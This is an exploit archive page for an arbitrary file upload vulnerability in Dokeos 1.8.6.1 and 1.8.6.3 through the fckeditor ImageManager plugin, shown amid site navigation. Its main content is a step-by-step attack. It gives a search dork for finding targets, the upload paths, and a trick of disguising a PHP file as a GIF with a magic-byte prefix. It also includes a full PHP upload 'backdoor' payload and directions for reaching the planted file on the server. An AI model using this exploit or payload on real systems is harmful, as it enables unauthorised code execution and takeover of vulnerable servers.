Dokeos 1.8.6.1 / 1.8.6.3 Arbitrary File Upload

Dokeos 1.8.6.1 / 1.8.6.3 Arbitrary File Upload: Posted Sep 21, 2019; Authored by Sohel Yousef; Dokeos versions 1.8.6.1 and 1.8.6.3 suffer from a remote file upload vulnerability via an fckeditor.; tags | exploit, remote, file upload; SHA-256 | a34c5bc273539d18504d7ef6b95850754f1b0d7d3e22ab812753d75fb41c2d49; Download | Favorite | View

Dokeos 1.8.6.1 / 1.8.6.3 Arbitrary File Upload

# Exploit Title: Dokeos 1.8.6.3 and 1.8.6.1- Arbitrary File Upload
# Google Dork: "Plateforme Dokeos 1.8.6.3 " or 1.8.6.1
# Date: 17/09/2019
# Exploit Author: Sohel Yousef Jellyfish security team
# Vendor Homepage: https://www.dokeos.com/
# Software Link: https://www.dokeos.com/
# Version: 1.8.6.3 - 1.8.6.1
# Tested on: kali linux
# CVE : N/A

# go to this dir to upload your file dokeos
1.8.6.3/main/inc/lib/fckeditor/editor/plugins/ImageManager/manager.php
# you can insert and upload files  rename your file to bel like
backdoor.php.gif
# and add this  GIF89;aGIF89;aGIF89;a   before <?PHP
# to be like this for examlple

GIF89;aGIF89;aGIF89;a<html>
 <head>
  <title>PHP Test</title>
  <form action="" method="post" enctype="multipart/form-data">
  <input type="file" name="fileToUpload" id="fileToUpload">
  <input type="submit" value="upload file" name="submit">
  </form>
 </head>
 <body>
 <?php echo '<p>FILE UPLOAD</p><br>';
 $tgt_dir = "uploads/";
 $tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
 echo "<br>TARGET FILE= ".$tgt_file;
 //$filename = $_FILES['fileToUpload']['name'];
 echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
 if(isset($_POST['submit']))
 {
 if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
    { echo "<br>file exists, try with another name"; }
 else   {
         echo "<br>STARTING UPLOAD PROCESS<br>";
        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
$tgt_file))
        { echo "<br>File UPLOADED:- ".$tgt_file; }

          else  { echo "<br>ERROR WHILE UPLOADING FILE<br>"; }
    }
 }
?>
 </body>
</html>

# upload the file and you can find your file here on this image browser
main/inc/lib/fckeditor/editor/plugins/ImageManager/images.php
# click and view the image / file you and will be here --->
dokeos/main/upload/users/0/my_files/.thumbs/.yourfile.php.gif
# remove .thumbs. to be like this
/main/upload/users/0/my_files/yourfile.php.gif
# and your file are ready
################################################################################################

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Dokeos 1.8.6.1 / 1.8.6.3 Arbitrary File Upload

Dokeos 1.8.6.1 / 1.8.6.3 Arbitrary File Upload

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Dokeos 1.8.6.1 / 1.8.6.3 Arbitrary File Upload

Share This

Dokeos 1.8.6.1 / 1.8.6.3 Arbitrary File Upload

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems